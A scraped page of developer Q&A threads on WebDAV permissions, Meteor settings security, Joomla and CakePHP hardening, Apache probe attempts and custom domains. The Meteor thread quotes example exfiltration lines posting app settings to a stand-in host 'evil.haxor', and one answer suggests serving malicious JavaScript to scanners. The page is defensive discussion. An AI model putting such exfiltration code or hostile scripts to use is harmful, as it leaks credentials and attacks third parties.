Webdav authentication performance / alternatives - iis

I am trying to find out how suitable Webdav is for a product by the company i am working at.
Our needs seem to exceed what Webdav has to offer and i'm trying to find out if my theory is correct and if so how we could work around it.
I am using the Webdav-package which you can install through the "add/remove windows features"-dialog.
The problem is that we want to be able to set permissions for each file and since we can access and change authoring-rules by code this is more or less possible.
Authoring-rules seem to apply to folders and not individual files but this could be worked around by giving each file it's own folder (although it's a bit ugly).
To me this solution seems very inefficient mainly because the authoring-rules are all placed in a list which means that for all file-requests the server has to loop through the entire list which gets larger for every file added to the server.
My thought is that we could build some kind of "proxy" that checks permissions in a more efficient way and if the user has permission to access the file we just forward the request to the webdav-server.
This might also be inefficient though since we have to have an application managing the connection between the user and the Webdav-server but at least the inefficiency isn't exponential.
I guess this leads to the questions:
Is Webdav at all suitable for more complex permissions?
Is there some part of Webdav that i have missed which solves this problem?
If so, would it be better to go with the internal solution or should we do an external solution?
If not Webdav, is there a better solution? (We want all the nice file-locking, version-control and office-integration stuff)

use an HttpModule to apply your authorization rules.
system.webServer/modules has an attribute runManagedModulesForWebDavRequests
(!not the same as runAllManagedModulesForAllRequests)

Forget about IIS
Forget about pure WebDAV
Build|get Apache+mod_svn
Use path-based authorization in SVN, which can enable (if needed) rules on per-file basis

Related

How can I prevent 3rd-party packages from having direct access to Meteor.settings?

I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party meteor package such as iron:router, but possibly one by a lesser known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post on which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all on their plates (Windows support, a non-Mongo DB).. I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should be notions of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the issue of settings being (easily) modifiable at runtime, could be addressed via making the settings object read-only, using ES5 properties.
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
set up a firewall with outbound rules and logging. Unfortunately if your application communicates with any sort of social network (facebook, twitter) then the firewall idea will not handle malware that uses twitter as a way to transmit data. But maybe it would help?
lock down the DNS resolution, provide a whitelist of DNS lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'
There are other more advanced detectors - but at some point a hacker is going to go after the other services running on the box and not try for modifying your code.
Good luck. And its good to be paranoid -- because they really are out to get you.

Is Joomla user management safe enough to handle potential data?

How difficult/easy is it to break into Joomla backend & to access the pages which are only set to be accessible by selected Joomla users of the website? Is it safe enough to rely on Joomla's management system?
Yes, Joomla is quite secure system by itself. Although you have to be careful with third party extensions and always track update news for all components (including core) you have installed and use your judgement about updating them. Usually security issues spotted quite quickly and you have time before succeed attack.
Another thing keep in mind is proactive defense with all possible means you have in hands, this includes .htaccess and .htpasswd, also good idea to restrict ftp access to only local ips and use sftp instead.
Also check out the security extensions around JED, the ones which prevents high level DDoS and extend admin page access protection might be also helpful, usually they are simple modules or plugins.
And yes, do not forget change default username for superuser. And change all passwords ftp/superusers/mysql/htpasswd on regular basis.
Follow this simple rules and you will be fine, at least most of the time you will be fine.
While Joomla security is fairly good, you need to keep up with the patches and, as dmi3y mentioned, you need to watch the third party extensions.
When it comes to information security, nothing is ever perfect. This solution may or may not be appropriate depending on the type of information that you are looking to secure, the number of users accessing it and how you manage the user rights.

What are the things that must be taken care of before deploying a cakephp website

Im just done with a cakephp website, but im still in a doubt on what are the things that I must take care of, before making this website live.
Since it is a big application that require users to Register and Login and to manage their accounts. Any sort of help is appreciated.
Thanx.
There is a section in the CakePHP book answering directly that:
http://book.cakephp.org/2.0/en/deployment.html
Harden instillation, set production mode if you are using different SQL services, disable php error reporting, enable caching, disable and remove all client side debugging like DebugKit, make sure any comments in your html will not give hackers an advantage like printing variables.
Php frameworks can be resource hogs. I think the last but most important is to test server with some generated traffic. There are services that can do this for you. You may need to separate resources or set up an additional server for SQL if you expect a lot of traffic.
There may be a couple other things you might want to do.. Just browse your core.php and bootstrap.php. Make sure everything is working is correctly for production environment.
Here are some common but important things to be taken care of before making cake website live.
Check for read/write permissions on desired folders.
Check for images,js files and css files you need on your website .
Check for writable temp folder and clear cache.
Set debug level to 0.
Make sure database connectivity works fine.

Best way to stop "xss"-hackers and similar

I've noticed yesterday by looking into my apache error log that someone tried to get access to the website via calling a lot of sites like:
mywebsite.com/phpmyadmin
mywebsite.com/dbadmin
mywebsite.com/mysqladmin
mywebsite.com/foo.php#some-javascript
...
This caused a lot of 404 errors. What's the best way to stop them doing so?
I thought about creating a fake-phpmyadmin dir with some php code that bans their ip address from my website when accessing this dir for about 12 to 24 h.
Is there a better way to deal with this kind of guys?
You should take a look at Fail2ban, it's pretty easy to set up in Apache.
You can't really prevent people from trying these sorts of attacks. The best you can do is log all these sorts of attempts like you're currently doing and maybe implement some sort of temporary blacklisting.
The security of your site shouldn't depend on people not trying to do these sorts of attacks, since you will never be able to fully prevent them.
If none of those exist, they're not gonna be able to do anything. You just have to worry about them being able to access parts that do exist and that you don't want them to access. Or using your poorly written scripts with XSS holes in it.
You could make it harder on them by checking if they're trying to access a common XSS path (like phpMyAdmin's normal path) and use an alternate 404 page that has malicious javascript on it or something.

Allowing users to point their domains to a web-based application?

I'm possibly developing a web-based application that allows users to create individual pages. I would like users to be able to use their own domains/sub-domains to access the pages.
So far I've considered:
A) Getting users to forward with masking to their pages. Probably the most in-efficient option, as having used this before myself I'm pretty sure it iFrames the page (not entirely sure though).
B) Having the users download certain files, which then make calls to the server for information for their specific account settings via a user key of some sort. The most efficient in my mind at the moment, however, this requires letting users see a fair degree of source code, something I'd rather not do if possible
C) Getting the users to add a C-NAME record to their DNS settings, which is semi in-efficient (most of these users will be used to uploading files via FTP hence why B is the most efficient option), but at the same time means no source code will be seen by them.
The downside is, I have no idea how to implement C or what would be needed.
I got the idea from: http://unbounce.com/features/custom-urls/.
I'm wondering what method of the three I should use to allow custom urls for users, I would prefer to do C, but I have no idea how to implement it (I'm kind of asking how), and whether or not the time spent learning how-to/getting that kind of functionality set-up would even be worth it.
Any answers/opinions/comments would be very much appreciated :)!
Option C is called wildcard DNS: I've linked to a writeup that gives an example of how to do it using Apache. Other web server setups should be able to do this as well: for what you want it is well worth it.

Resources